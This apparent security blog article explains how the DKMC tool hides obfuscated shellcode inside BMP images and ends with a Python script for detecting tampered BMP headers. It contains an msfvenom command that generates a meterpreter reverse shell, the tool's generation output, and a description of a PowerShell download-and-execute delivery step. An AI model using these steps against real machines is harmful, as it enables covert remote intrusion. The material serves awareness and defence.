Can an ordinary picture be a threat, and is it worth paying attention to image downloads when analyzing information security incidents? We will answer this and other questions in this text using the DKMC tool (Don't Kill My Cat) as an example.
What is the point?
Look at the image below.
Do you notice anything strange about it?
Nothing looks unusual. The image is uploaded to the site in JPEG format, but its original is stored as a BMP. Opening the original BMP file in a hex editor does not reveal any glaring oddities either.
However, this image contains obfuscated shellcode at offset 0x00200A04, and yet no strange pixels are visible. The reason is that the image height in the BMP header was artificially reduced. The full-size image would look like this. Pay attention to the upper right corner.
The original image is 5 pixels taller than the malicious one, but a person usually does not notice this.
Injection is possible because the file-type signature at the start of the file, "BM" in ASCII (42 4D in hex), decodes to assembler instructions that do not cause a runtime error, and the following 8 bytes of the header do not affect how the image is interpreted. So these 8 bytes can be filled with any assembly instructions, for example a jmp instruction pointing to the shellcode stored in the image, i.e. to 0x00200A04.
Next, the code stored in the image has to be executed somehow instead of the image being displayed.
A set of PowerShell commands, for example, can be used for this.
All the actions I have described are already automated and combined in the DKMC tool, which we discuss below.
Does this really work?
The tool is available on GitHub and does not require installation. The repository also contains a presentation that describes the principle of DKMC operation in detail.
Launch it with:
python dkmc.py
Several actions are available.
First you need to create shellcode. msfvenom can be used for this.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f raw > mycode
A reverse-connect shell to host 192.168.1.3, port 4444, will be generated in binary form.
Then the sc menu option is used to convert the code to HEX format for further use.
Next, a BMP image is selected for shellcode injection using the gen command, and we get the following output:
(generate)>>> run
[+] Image size is 1000 x 700
[+] Generating obfuscation key 0x14ae6c1d
[+] Shellcode size 0x14d (333) bytes
[+] Adding 3 bytes of padding
[+] Generating magic bytes 0x4d9d392d
[+] Final shellcode length is 0x19f (415) bytes
[+] New BMP header set to 0x424de9040a2000
[+] New height is 0xb7020000 (695)
[+] Successfully save the image. (/root/av_bypass/DKMC/output/prettycat.bmp)
The output says that the shellcode was obfuscated, gives its final size, shows the modified BMP header containing the jump instruction, and reports that the height was reduced from 700 to 695 pixels.
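The two header changes described above (a rewritten size field after "BM" and a reduced height that leaves unrendered rows at the end of the file) are both visible to a simple parser. The following triage check is an added example written for this article, not code from the DKMC tool or its repository; the sample BMP it inspects is constructed inside the script, and the tampered copy only reproduces the header bytes reported in the output above.

```python
import struct

def inspect_bmp(data: bytes) -> dict:
    """Parse a BITMAPINFOHEADER BMP and return the header anomalies that
    DKMC-style injection leaves behind: a bogus size field, data past the
    declared pixel rows, and non-zero reserved words."""
    if len(data) < 54 or data[:2] != b"BM":
        raise ValueError("not a BMP with a 54-byte header")
    file_size, res1, res2, pix_off = struct.unpack_from("<IHHI", data, 2)
    _dib_size, width, height, _planes, bpp = struct.unpack_from("<IiiHH", data, 14)
    stride = ((bpp * width + 31) // 32) * 4          # rows are padded to 4 bytes
    declared_pixels = stride * abs(height)           # negative height = top-down BMP
    trailing = max(len(data) - (pix_off + declared_pixels), 0)
    return {
        "file_size_mismatch": file_size != len(data),  # offset 2 overwritten (e.g. by a jmp)
        "reserved_nonzero": res1 != 0 or res2 != 0,    # the format requires both words to be 0
        "trailing_bytes": trailing,                    # bytes a viewer will never render
        "hidden_rows": trailing // stride if stride else 0,
    }

def make_bmp(width: int, height: int, pixel_bytes: bytes) -> bytes:
    """Constructed sample: a minimal 24-bit BMP (not a real picture, demo only)."""
    assert len(pixel_bytes) == ((24 * width + 31) // 32) * 4 * height
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + len(pixel_bytes), 0, 0, 54)
    dib_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                          len(pixel_bytes), 2835, 2835, 0, 0)
    return file_hdr + dib_hdr + pixel_bytes

def demo():
    width, height = 2, 3                             # 3 rows of 8 bytes (6 pixel bytes + 2 pad)
    clean = make_bmp(width, height, bytes(8 * height))
    # Reproduce the header changes from the article: the declared height is reduced
    # by one row so the tail is never drawn, and the size field at offset 2 is
    # replaced by the bytes the tool reported after "BM" (0x424de9040a2000).
    tampered = bytearray(clean)
    struct.pack_into("<i", tampered, 22, height - 1)
    tampered[2:7] = bytes.fromhex("e9040a2000")
    return inspect_bmp(clean), inspect_bmp(bytes(tampered))

if __name__ == "__main__":
    for name, result in zip(("clean", "tampered"), demo()):
        print(name, result)
```

On a real sample the same check should be run against the declared height versus the file length; the 5 hidden rows of a 1000-pixel-wide 24-bit image add up to 15,000 unrendered bytes, which is the signal a mail or proxy scanner can act on.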
Then, using the ps command, you can generate a PowerShell command that downloads this image from a web server and executes it, and using the web command you can immediately start the web server that serves the image.
I will launch the Wireshark sniffer and see what happens on the network when the PowerShell script is launched on the victim side.
The victim initiates an ordinary HTTP request and receives a picture, while on our side a session is established.
Since the image cannot be run in "normal" ways, protection tools and specialists may treat its contents "lightly". This example calls for careful attention to configuring intrusion prevention systems, following the news in the information security world, and staying alert.